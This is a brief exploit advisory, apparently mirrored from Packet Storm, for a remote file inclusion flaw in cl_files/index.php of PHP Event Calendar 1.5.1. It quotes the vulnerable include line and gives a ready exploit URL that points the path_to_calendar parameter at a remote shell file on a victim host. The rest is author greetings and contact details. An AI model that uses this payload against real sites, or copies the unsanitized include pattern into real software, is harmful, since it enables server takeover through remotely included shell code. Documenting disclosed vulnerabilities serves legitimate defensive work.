PHP Event Calendar version 1.5.1 suffers from a remote file inclusion vulnerability in index.php.
960f9c7b732e6f38ddf9d938a35f68e05ed9065a26fc7af5d7c4d4907a014f0cTitle : PHP Event Calendar 1.5.1 (index.php) Remote File Include
Vulnerability
########################################################################
#######
Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi}
------------------------------------------------------------------------
Sorce Code:
**********
http://www.scriptdungeon.com/jump.php?ScriptID=633
Affected software description :
******************************
Title: PHP Event Calendar
// URL: http://www.softcomplex.com/products/php_event_calendar/
// Version: 1.5.1
// Date: 03/04/2005 (mm/dd/yyyy)
// Tech. support: http://www.softcomplex.com/forum/forumdisplay.php?fid=55
Catégorie :Remote File Include
------------------------------------------------------------------------
Vulnerable Code:
***************
include $path_to_calendar."calendar.php";
affected file: cl_files/index.php
----------------------------------------------------------------------
Exploit:
*******
http://www.VicTim.com/[Script_Path]/cl_files/index.php?path_to_calendar=Shell.txt?
------------------------------------------------------------------------
----
greetz: Studio36-DeStRoY-ToOoFA-AsbMay-Mr.3freet-Simba-Disco-Faiçeu-YouSSeF
& all my friends
Special Greeting:AsbMay's Group & TrYaG TeaM
channel:www.asb-may.net & www.tryag.com
contact:spoonman500[at]hotmail[dot]com / ThE-LoRd-Of-CrAcKiNg@hotmail.com
_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed